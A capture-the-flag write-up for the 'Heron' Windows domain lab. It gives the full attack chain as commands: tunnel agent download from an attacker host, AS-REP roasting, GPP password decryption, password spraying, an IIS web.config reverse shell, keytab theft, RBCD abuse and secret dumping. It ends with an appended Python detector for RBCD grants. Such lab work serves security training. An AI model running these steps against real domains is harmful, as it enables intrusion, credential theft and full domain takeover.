Chain Heron
Writeup Author: bobbuilder
Overview
Category: Chain
Difficulty: Medium
Machine: Windows
Objective: Heron is an assumed-breach Windows domain scenario. Initial access is provided on a jump server as a low-privileged user. The objective is to pivot to the internal DC, escalate privileges, and extract secrets using a combination of Kerberos abuse, credential hunting, RBCD, and web shell deployment.
Enumeration
Initial Access
sshpass -p 'Heron123!' ssh pentest@<jumppoint_ip>
Ligolo-ng Setup (Attack Box)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <jumppoint_ip> via <local_gateway_ip>
sudo ip route add <target_subnet>/24 dev ligolo
./proxy -selfcert -laddr 0.0.0.0:443
Ligolo-ng Agent (Jump Box)
wget <attacker_ip>/agent
./agent -connect <attacker_ip>:443 -ignore-cert
Route to DC
sudo ip route add <dc_ip>/32 dev ligolo
Port Scan and LDAP Discovery
nxc ldap <dc_ip> -u guest -p '' --dns-server <dc_ip> --dns-tcp
Web Enumeration
- Website: http://<dc_ip>/ exposed 3 users.
- Found subdomain with 401 auth: accounting.heron.vl
Subdomain Fuzzing
wfuzz -c --hc 200 -w <subdomain_wordlist> -H "Host: FUZZ.heron.vl" -u http://heron.vl
Kerberos & User Hunting
AS-REP Roasting
impacket-GetNPUsers heron.vl/guest:'' -no-pass -request -k -usersfile users_heron.vl.txt
Cracked Credentials
samuel.davies:<REDACTED>
SMB Enumeration with Valid Creds
nxc smb <dc_ip> -u samuel.davies -p '<REDACTED>' --shares -M spider_plus -o DOWNLOAD_FLAG=true
GPP Password Disclosure
python3 gpp-decrypt.py -f /path/to/Groups.xml
Recovered:
Username: Administrator
Password: <REDACTED>
Domain User Enumeration
nxc smb heron.vl -u users_heron.vl.txt -p '<REDACTED>' --continue-on-success
Found:
svc-web-accounting-d:<REDACTED>
Web Shell Deployment (IIS)
Upload Web Shell via SMB
impacket-smbclient heron.vl/svc-web-accounting-d:'<REDACTED>'@<webserver_ip>
# put web.config (with embedded reverse shell)
Trigger Reverse Shell
curl -u svc-web-accounting-d:<REDACTED> http://accounting.heron.vl/rev.shell
Lateral Movement: Jump Box Privilege Escalation
Extract SSH Creds from .lnk files
cat frajmp.lnk # Extracts: _local:<REDACTED>
Escalate to Root
su _local
sudo su
Kerberos Keytab Extraction
Find and Transfer Keytab
find / -type f -iname '*.keytab'
scp pentest@<jumppoint_ip>:/home/pentest/krb5.keytab .
Parse Keytab
klist -k -t krb5.keytab
python3 keytabextract.py krb5.keytab
Extracted:
FRAJMP$:<REDACTED>
Second Set of Credentials
From mucjmp.lnk:
adm_prju:a<REDACTED>
RBCD (Resource-Based Constrained Delegation)
Grant Delegation
python3 rbcd.py -delegate-from 'FRAJMP$' -delegate-to 'MUCDC$' -action 'write' heron/adm_prju:<REDACTED> -dc-ip <dc_ip>
Get Service Ticket
impacket-getST -impersonate _admin -spn cifs/mucdc.heron.vl -dc-ip <dc_ip> heron/'FRAJMP$' -hashes :<REDACTED>
export KRB5CCNAME=/path/to/_admin@cifs_mucdc.heron.vl@HERON.VL.ccache
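As an added defensive example (not code from the writeup), a small detector for the RBCD grant performed above: it scans Windows Security event 5136 records for a "value added" write to msDS-AllowedToActOnBehalfOfOtherIdentity and rates a write onto a Domain Controller account as critical. The sample records are constructed, and the allowlist and OU check are assumptions to tune per environment.

```python
"""Flag RBCD grants in Windows Security event 5136 (directory service object modified).

Added example, not part of the original writeup. The records below are constructed
sample events in a JSON-export shape (field names follow the 5136 event data names);
the allowlist and the Domain Controllers OU check are assumptions to tune locally.
"""

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "value added"
DC_OU_MARKER = "ou=domain controllers"
ALLOWED_WRITERS = {"svc-ad-automation"}  # assumption: accounts expected to manage delegation

# Constructed sample events; the first 5136 mirrors the writeup's RBCD step
# (adm_prju writing the attribute on the DC computer account MUCDC$).
SAMPLE_EVENTS = [
    {"EventID": 4624, "SubjectUserName": "samuel.davies"},
    {"EventID": 5136, "SubjectUserName": "adm_prju",
     "ObjectDN": "CN=MUCDC,OU=Domain Controllers,DC=heron,DC=vl",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "svc-ad-automation",
     "ObjectDN": "CN=WEB01,OU=Servers,DC=heron,DC=vl",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": VALUE_ADDED},
    {"EventID": 5136, "SubjectUserName": "adm_prju",
     "ObjectDN": "CN=MUCDC,OU=Domain Controllers,DC=heron,DC=vl",
     "AttributeLDAPDisplayName": "description", "OperationType": VALUE_ADDED},
]

def classify(event):
    """Return a finding for an RBCD grant, or None for any other event."""
    if event.get("EventID") != 5136 or event.get("AttributeLDAPDisplayName") != RBCD_ATTR:
        return None
    if event.get("OperationType") != VALUE_ADDED:
        return None  # removal of the attribute is cleanup, not a new grant
    writer = event.get("SubjectUserName", "").lower()
    target = event.get("ObjectDN", "")
    if DC_OU_MARKER in target.lower():
        severity = "critical"  # delegation onto a DC account lets the front end impersonate users to the DC
    elif writer not in ALLOWED_WRITERS:
        severity = "high"
    else:
        severity = "info"
    return {"writer": writer, "target": target, "severity": severity}

def scan(events):
    """Run classify() over an iterable of events and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

Feed it the 5136 events from the DC's Security log (SACL auditing on computer objects must be enabled for the attribute write to be logged).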
Post-Exploitation
Dump Secrets
impacket-secretsdump -k mucdc.heron.vl
Access C$ with Admin Ticket
smbclient \\\\<dc_ip>\\C$ -U '_admin' --pw-nt-hash <NTLM_HASH>